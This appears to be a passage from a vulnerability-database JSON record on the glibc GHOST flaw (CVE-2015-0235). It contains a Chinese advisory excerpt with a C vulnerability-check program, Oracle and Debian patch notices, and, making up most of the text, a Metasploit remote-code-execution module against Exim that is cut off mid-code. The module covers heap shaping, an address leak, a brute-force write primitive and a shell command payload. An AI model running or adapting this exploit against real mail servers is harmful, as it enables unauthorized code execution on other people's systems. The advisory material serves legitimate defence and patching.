6/7\uff1a</strong></p><p>\u4f7f\u7528\u5b98\u65b9\u6e90\uff0c\u7136\u540e\u6267\u884c\uff1a</p><p># yum clean all && yum update</p><p> </p><p><strong>\u53c2\u8003\u94fe\u63a5\uff1a</strong></p><ul><li><a href=\"http://www.openwall.com/lists/oss-security/2015/01/27/9\">http://www.openwall.com/lists/oss-security/2015/01/27/9</a></li><li><a href=\"http://d.hatena.ne.jp/Kango/20150128/1422409960\">http://d.hatena.ne.jp/Kango/20150128/1422409960</a></li></ul>", "modified": "2015-07-02T00:00:00", "published": "2015-07-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89237", "id": "SSV:89237", "type": "seebug", "title": "Linux glibc \u7f13\u51b2\u533a\u6ea2\u51fa\n (\u5e7d\u7075(Ghost))", "sourceData": "\n #include <netdb.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n \n#define CANARY \"in_the_coal_mine\"\n \nstruct {\n char buffer[1024];\n char canary[sizeof(CANARY)];\n} temp = { \"buffer\", CANARY };\n \nint main(void) {\n struct hostent resbuf;\n struct hostent *result;\n int herrno;\n int retval;\n \n /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/\n size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;\n char name[sizeof(temp.buffer)];\n memset(name, '0', len);\n name[len] = '\\0';\n \n retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);\n \n if (strcmp(temp.canary, CANARY) != 0) {\n puts(\"vulnerable\");\n exit(EXIT_SUCCESS);\n }\n if (retval == ERANGE) {\n puts(\"not vulnerable\");\n exit(EXIT_SUCCESS);\n }\n puts(\"should not happen\");\n exit(EXIT_FAILURE);\n}\n#* from http://www.openwall.com/lists/oss-security/2015/01/27/9 */\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-89237"}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:59", "bulletinFamily": "unix", "description": "[2.3.4-2.57.0.1.el4.1]\n- CVE-2015-0235 Fix parsing of numeric hosts in gethostbyname_r (John Haxby) [orabug 20439586]", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "id": "ELSA-2015-0101", "href": "http://linux.oracle.com/errata/ELSA-2015-0101.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "unix", "description": "[2.5-123.0.1.el5_11.1]\n- Switch to use malloc when the input line is too long [Orabug 19951108]\n- Use a /sys/devices/system/cpu/online for _SC_NPROCESSORS_ONLN implementation [Orabug 17642251] (Joe Jin)\n[2.5-123.1]\n- Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).", "modified": "2015-01-27T00:00:00", "published": "2015-01-27T00:00:00", "id": "ELSA-2015-0090", "href": "http://linux.oracle.com/errata/ELSA-2015-0090.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:38", "bulletinFamily": "unix", "description": "[2.5-123.0.1.el5_11.3]\n- Switch to use malloc when the input line is too long [Orabug 19951108] (Jason Luan)\n- Use a /sys/devices/system/cpu/online for _SC_NPROCESSORS_ONLN implementation [Orabug 17642251] (Joe Jin)\n[2.5-123.3]\n- Fix invalid-free when using getaddrinfo() and AI_IDN (CVE-2013-7424,\n[2.5-123.1]\n- Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "ELSA-2015-1627", "href": "http://linux.oracle.com/errata/ELSA-2015-1627.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:51", "bulletinFamily": "unix", "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u4\nCVE ID : CVE-2015-0235\n\nA vulnerability has been fixed in eglibc, Debian's version of the GNU C\nlibrary:\n\nCVE-2015-0235\n\n Qualys discovered that the gethostbyname and gethostbyname2\n functions were subject to a buffer overflow if provided with a\n crafted IP address argument. This could be used by an attacker to\n execute arbitrary code in processes which called the affected\n functions.\n\n The original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have already been\nfixed in squeeze LTS via DLA DLA 97-1.\n\n\n", "modified": "2015-01-28T10:26:11", "published": "2015-01-28T10:26:11", "id": "DEBIAN:DLA-139-1:5734D", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201501/msg00012.html", "title": "[SECURITY] [DLA 139-1] eglibc security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:00", "bulletinFamily": "exploit", "description": "", "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "href": "https://packetstormsecurity.com/files/130974/Exim-GHOST-glibc-gethostbyname-Buffer-Overflow.html", "id": "PACKETSTORM:130974", "type": "packetstorm", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow', \n'Description' => %q( \nThis module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based \nbuffer overflow in the GNU C Library's gethostbyname functions) on x86 \nand x86_64 GNU/Linux systems that run the Exim mail server. \n \nFor additional information, please refer to the module's References \nsection. \n), \n'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'], \n'License' => BSD_LICENSE, \n'References' => [ \n['CVE', '2015-0235'], \n['US-CERT-VU', '967332'], \n['OSVDB', '117579'], \n['BID', '72325'], \n['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt'], \n['URL', 'https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability'], \n['URL', 'http://r-7.co/1CAnMc0'] # MSF Wiki doc (this module's manual) \n], \n'DisclosureDate' => 'Jan 27 2015', \n'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim) \n'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload \n'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^ \n'Payload' => { \n'Space' => 255, # the shorter the payload, the higher the probability of code execution \n'BadChars' => \"\", # we encode the payload ourselves, because ^ \n'DisableNops' => true, \n'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell \n}, \n'Targets' => [['Automatic', {}]], \n'DefaultTarget' => 0 \n)) \n \nregister_options([ \nOpt::RPORT(25), \nOptAddress.new('SENDER_HOST_ADDRESS', [true, \n'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil]) \n], self.class) \n \nregister_advanced_options([ \nOptBool.new('FORCE_EXPLOIT', [false, 'Let the exploit run anyway without the check first', nil]) \n], self.class) \nend \n \ndef check \n# for now, no information about the vulnerable state of the target \ncheck_code = Exploit::CheckCode::Unknown \n \nbegin \n# not exploiting, just checking \nsmtp_connect(false) \n \n# malloc()ate gethostbyname's buffer, and \n# make sure its next_chunk isn't the top chunk \n \n9.times do \nsmtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0) \nsmtp_recv(HELO_CODES) \nend \n \n# overflow (4 bytes) gethostbyname's buffer, and \n# overwrite its next_chunk's size field with 0x00303030 \n \nsmtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4) \n# from now on, an exception means vulnerable \ncheck_code = Exploit::CheckCode::Vulnerable \n# raise an exception if no valid SMTP reply \nreply = smtp_recv(ANY_CODE) \n# can't determine vulnerable state if smtp_verify_helo() isn't called \nreturn Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ \n \n# realloc()ate gethostbyname's buffer, and \n# crash (old glibc) or abort (new glibc) \n# on the overwritten size field \n \nsmtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4) \n# raise an exception if no valid SMTP reply \nreply = smtp_recv(ANY_CODE) \n# can't determine vulnerable state if smtp_verify_helo() isn't called \nreturn Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/ \n# a vulnerable target should've crashed by now \ncheck_code = Exploit::CheckCode::Safe \n \nrescue \npeer = \"#{rhost}:#{rport}\" \nvprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\") \n \nensure \nsmtp_disconnect \nend \n \nreturn check_code \nend \n \ndef exploit \nunless datastore['FORCE_EXPLOIT'] \nprint_status(\"Checking if target is vulnerable...\") \nfail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable \nprint_good(\"Target is vulnerable.\") \nend \ninformation_leak \ncode_execution \nend \n \nprivate \n \nHELO_CODES = '250|451|550' \nANY_CODE = '[0-9]{3}' \n \nMIN_HEAP_SHIFT = 80 \nMIN_HEAP_SIZE = 128 * 1024 \nMAX_HEAP_SIZE = 1024 * 1024 \n \n# Exim \nALIGNMENT = 8 \nSTORE_BLOCK_SIZE = 8192 \nSTOREPOOL_MIN_SIZE = 256 \n \nLOG_BUFFER_SIZE = 8192 \nBIG_BUFFER_SIZE = 16384 \n \nSMTP_CMD_BUFFER_SIZE = 16384 \nIN_BUFFER_SIZE = 8192 \n \n# GNU C Library \nPREV_INUSE = 0x1 \nNS_MAXDNAME = 1025 \n \n# Linux \nMMAP_MIN_ADDR = 65536 \n \ndef fail_with(fail_subject, message) \nmessage = \"#{message}. For more info: http://r-7.co/1CAnMc0\" \nsuper(fail_subject, message) \nend \n \ndef information_leak \nprint_status(\"Trying information leak...\") \nleaked_arch = nil \nleaked_addr = [] \n \n# try different heap_shift values, in case Exim's heap address contains \n# bad chars (NUL, CR, LF) and was mangled during the information leak; \n# we'll keep the longest one (the least likely to have been truncated) \n \n16.times do \ndone = catch(:another_heap_shift) do \nheap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15) \nprint_debug(\"#{{ heap_shift: heap_shift }}\") \n \n# write the malloc_chunk header at increasing offsets (8-byte step), \n# until we overwrite the \"503 sender not yet given\" error message \n \n128.step(256, 8) do |write_offset| \nerror = try_information_leak(heap_shift, write_offset) \nprint_debug(\"#{{ write_offset: write_offset, error: error }}\") \nthrow(:another_heap_shift) if not error \nnext if error == \"503 sender not yet given\" \n \n# try a few more offsets (allows us to double-check things, \n# and distinguish between 32-bit and 64-bit machines) \n \nerror = [error] \n1.upto(5) do |i| \nerror[i] = try_information_leak(heap_shift, write_offset + i*8) \nthrow(:another_heap_shift) if not error[i] \nend \nprint_debug(\"#{{ error: error }}\") \n \n_leaked_arch = leaked_arch \nif (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize \n(error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd \n(error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size \n(error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing() \nleaked_arch = ARCH_X86_64 \n \nelsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize \n(error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd \n(error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size \n(error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing() \nleaked_arch = ARCH_X86 \n \nelse \nthrow(:another_heap_shift) \nend \nprint_debug(\"#{{ leaked_arch: leaked_arch }}\") \nfail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch \n \n# try different large-bins: most of them should be empty, \n# so keep the most frequent fd_nextsize address \n# (a pointer to the malloc_chunk itself) \n \ncount = Hash.new(0) \n0.upto(9) do |last_digit| \nerror = try_information_leak(heap_shift, write_offset, last_digit) \nnext if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes \nnext if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK \ncount[error] += 1 \nend \nprint_debug(\"#{{ count: count }}\") \nthrow(:another_heap_shift) if count.empty? \n \n# convert count to a nested array of [key, value] arrays and sort it \nerror_count = count.sort { |a, b| b[1] <=> a[1] } \nerror_count = error_count.first # most frequent \nerror = error_count[0] \ncount = error_count[1] \nthrow(:another_heap_shift) unless count >= 6 # majority \nleaked_addr.push({ error: error, shift: heap_shift }) \n \n# common-case shortcut \nif (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or \n(leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?) \nleaked_addr = [leaked_addr.last] # use this one, and not another \nthrow(:another_heap_shift, true) # done \nend \nthrow(:another_heap_shift) \nend \nthrow(:another_heap_shift) \nend \nbreak if done \nend \n \nfail_with(\"infoleak\", \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil? \nfail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty? \n \nleaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length } \nleaked_addr = leaked_addr.first # longest \nerror = leaked_addr[:error] \nshift = leaked_addr[:shift] \n \nleaked_addr = 0 \n(leaked_arch == ARCH_X86 ? 4 : 8).times do |i| \nbreak if i >= error.length \nleaked_addr += error.unpack('C*')[i] * (2**(i*8)) \nend \n# leaked_addr should point to the beginning of Exim's smtp_cmd_buffer: \nleaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE \nfail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR \n \nprint_good(\"Successfully leaked_arch: #{leaked_arch}\") \nprint_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\") \n@leaked = { arch: leaked_arch, addr: leaked_addr } \nend \n \ndef try_information_leak(heap_shift, write_offset, last_digit = 9) \nfail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT) \nfail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0 \nfail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0 \nfail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/ \n \nsmtp_connect \n \n# bulletproof Heap Feng Shui; the hard part is avoiding: \n# \"Too many syntax or protocol errors\" (3) \n# \"Too many unrecognized commands\" (3) \n# \"Too many nonmail commands\" (10) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1) \nsmtp_recv(250) \n \n# overflow (3 bytes) gethostbyname's buffer, and \n# overwrite its next_chunk's size field with 0x003?31 \n# ^ last_digit \nsmtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT) \nbegin # ^ 0x30 | PREV_INUSE \nsmtp_recv(HELO_CODES) \n \nsmtp_send(\"RSET\") \nsmtp_recv(250) \n \nsmtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024) \nsmtp_recv(503, 'sender not yet given') \n \nsmtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"DATA\") \nreply = smtp_recv(503) \n \nlines = reply[:lines] \nfail if lines.size <= 3 \nfail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\" \nfail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\" \nfail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\" \n \n# if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting \n# (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed, \n# but happens with lower probability) \n \nerror = lines[+1..-3].join(\"\") \nerror.sub!(/\\A503-/mn, \"\") \nerror.sub!(/\\r\\n\\z/mn, \"\") \nerror.gsub!(/\\r\\n503-/mn, \"\\n\") \nreturn error \n \nrescue \nreturn nil \nend \n \nensure \nsmtp_disconnect \nend \n \ndef code_execution \nprint_status(\"Trying code execution...\") \n \n# can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore: \n# DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure \n# that rogue child processes cannot use them. \n \nfail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded \nfail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero? \n# Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes), \n# and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes). \nencoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&') \n# setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\" \ncommand = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}' \nprint_debug(command) \n \n# don't try to execute commands directly, try a very simple ACL first, \n# to distinguish between exploitation-problems and shellcode-problems \n \nacldrop = \"drop message=\" \nmessage = rand_text_alpha(command.length - acldrop.length) \nacldrop += message \n \nmax_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64) \nmax_heap_addr = @leaked[:addr] \nmin_heap_addr = nil \nsurvived = nil \n \n# we later fill log_buffer and big_buffer with alpha chars, \n# which creates a safe-zone at the beginning of the heap, \n# where we can't possibly crash during our brute-force \n \n# 4, because 3 copies of sender_helo_name, and step_len; \n# start big, but refine little by little in case \n# we crash because we overwrite important data \n \nhelo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4 \nloop do \n \nsender_helo_name = \"A\" * helo_len \naddress = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535) \n \n# the 3 copies of sender_helo_name, allocated by \n# host_build_sender_fullhost() in POOL_PERM memory \n \nhelo_ip_size = ALIGNMENT + \nsender_helo_name[+1..-2].length \n \nsender_fullhost_size = ALIGNMENT + \nsprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length \n \nsender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ? \nsprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) : \nsprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident]) \n).length \n \n# fit completely into the safe-zone \nstep_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) - \n(max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size) \nloop do \n \n# inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer \n# with alpha chars, which creates another safe-zone at the end of the heap) \nheap_addr = max_heap_addr \nloop do \n \n# try harder the first time around: we obtain better \n# heap boundaries, and we usually hit our ACL faster \n \n(min_heap_addr ? 1 : 2).times do \n \n# try the same heap_addr several times, but with different random offsets, \n# in case we crash because our hijacked storeblock's length field is too small \n# (we don't control what's stored at heap_addr) \n \nrand_offset = rand(max_rand_offset) \nprint_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\") \nreply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset) \nprint_debug(\"#{{ reply: reply }}\") if reply \n \nif reply and \nreply[:code] == \"550\" and \n# detect the parsed ACL, not the \"still in text form\" ACL (with \"=\") \nreply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn \nprint_good(\"Brute-force SUCCESS\") \nprint_good(\"Please wait for reply...\") \n# execute command this time, not acldrop \nreply = try_code_execution(helo_len, command, heap_addr + rand_offset) \nprint_debug(\"#{{ reply: reply }}\") \nreturn handler \nend \n \nif not min_heap_addr \nif reply \nfail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE \nsurvived = heap_addr \nelse \nif ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE \n# survived should point to our safe-zone at the beginning of the heap \nfail_with(\"codeexec\", \"never survived\") if not survived \nprint_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\" \nmin_heap_addr = survived \nend \nend \nend \nend \n \nheap_addr -= step_len \nbreak if min_heap_addr and heap_addr < min_heap_addr \nend \n \nbreak if step_len < 1024 \nstep_len /= 2 \nend \n \nhelo_len /= 2 \nbreak if helo_len < 1024 \n# ^ otherwise the 3 copies of sender_helo_name will \n# fit into the current_block of POOL_PERM memory \nend \nfail_with(\"codeexec\", \"Brute-force FAILURE\") \nend \n \n# our write-what-where primitive \ndef try_code_execution(len, what, where) \nfail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len \nfail_with(\"codeexec\", \"#{where} < 0\") if where < 0 \n \nx86 = (@leaked[:arch] == ARCH_X86) \nmin_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE)) \nheap_shift = min_heap_shift + rand(1024 - min_heap_shift) \nlast_digit = 1 + rand(9) \n \nsmtp_connect \n \n# fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars \nsmtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE - \n\"501 : sender address must contain a domain\\r\\n\\0\".length) \nsmtp_recv(501, 'sender address must contain a domain') \n \nsmtp_send(\"RSET\") \nsmtp_recv(250) \n \n# bulletproof Heap Feng Shui; the hard part is avoiding: \n# \"Too many syntax or protocol errors\" (3) \n# \"Too many unrecognized commands\" (3) \n# \"Too many nonmail commands\" (10) \n \n# / 5, because \"\\x7F\" is non-print, and: \n# ss = store_get(length + nonprintcount * 4 + 1); \nsmtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1) \nsmtp_recv(250) \n \n# overflow (3 bytes) gethostbyname's buffer, and \n# overwrite its next_chunk's size field with 0x003?31 \n# ^ last_digit \nsmtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1) \nsmtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE \n \n# auth_xtextdecode() is the only way to overwrite the beginning of a \n# current_block of memory (the \"storeblock\" structure) with arbitrary data \n# (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters). \n# this shapes the rest of our exploit: we overwrite the beginning of the \n# current_block of POOL_PERM memory with the current_block of POOL_MAIN \n# memory (allocated by auth_xtextdecode()). \n \nauth_prefix = rand_text_alpha(x86 ? 11264 : 11280) \n(x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) } \nauth_prefix += \".\" \n \n# also fill log_buffer with alpha chars \nsmtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030) \nsmtp_recv(501, 'invalid data for AUTH') \n \nsmtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len) \nbegin \nreply = smtp_recv(ANY_CODE) \nreturn reply if reply[:code] !~ /#{HELO_CODES}/ \nreturn reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/ \n \nsmtp_send(\"MAIL FROM:<>\") \nreply = smtp_recv(ANY_CODE) \nreturn reply if reply[:code] != \"250\" \n \nsmtp_send(\"RCPT TO:<postmaster>\") \nreply = smtp_recv \nreturn reply \n \nrescue \nreturn nil \nend \n \nensure \nsmtp_disconnect \nend \n \nDIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])' \nDOT = '[.]' \n \ndef smtp_connect(exploiting = true) \nfail_with(\"smtp_connect\", \"sock isn't nil\") if sock \n \nconnect \nfail_with(\"smtp_connect\", \"sock is nil\") if not sock \n@smtp_state = :recv \n \n# Receiving the banner (but we don't really need to check it) \nsmtp_recv(220) \nreturn if not exploiting \n \nsender_host_address = datastore['SENDER_HOST_ADDRESS'] \nif sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/ \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil? \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\") \nend \nsender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\" \n \n# turn helo_seen on (enable the MAIL command) \n# call smtp_verify_helo() (force fopen() and small malloc()s) \n# call host_find_byname() (force gethostbyname's initial 1024-byte malloc()) \nsmtp_send(\"HELO #{sender_host_address_octal}\") \nreply = smtp_recv(HELO_CODES) \n \nif reply[:code] != \"250\" \nfail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/ \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\") \nend \n \nif reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3 \nsmtp_active_hostname = $1 \nsender_host_name = $2 \n \nif sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn \nsender_host_name = $2 \nsender_ident = $1 \nelse \nsender_ident = nil \nend \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal \n \nelse \n# can't double-check sender_host_address here, so only for advanced users \nfail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['FORCE_EXPLOIT'] \n# worst-case scenario \nsmtp_active_hostname = \"A\" * NS_MAXDNAME \nsender_host_name = \"A\" * NS_MAXDNAME \nsender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127)); \nend \n \n_sender = @sender \n@sender = { \nhostaddr: sender_host_address, \nhostaddr8: sender_host_address_octal, \nhostname: sender_host_name, \nident: sender_ident, \n__smtp_active_hostname: smtp_active_hostname \n} \nfail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender \n \n# avoid a future pathological case by forcing it now: \n# \"Do NOT free the first successor, if our current block has less than 256 bytes left.\" \nsmtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16) \nsmtp_recv(501, 'sender address must contain a domain') \n \nsmtp_send(\"RSET\") \nsmtp_recv(250, 'Reset OK') \nend \n \ndef smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil) \nfail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send \n@smtp_state = :sending \n \nif not arg_pattern \nfail_with(\"smtp_send\", \"prefix is nil\") if not prefix \nfail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length \ncommand = prefix \n \nelse \nfail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length \nlength = arg_length - arg_prefix.length - arg_suffix.length \nfail_with(\"smtp_send\", \"len is 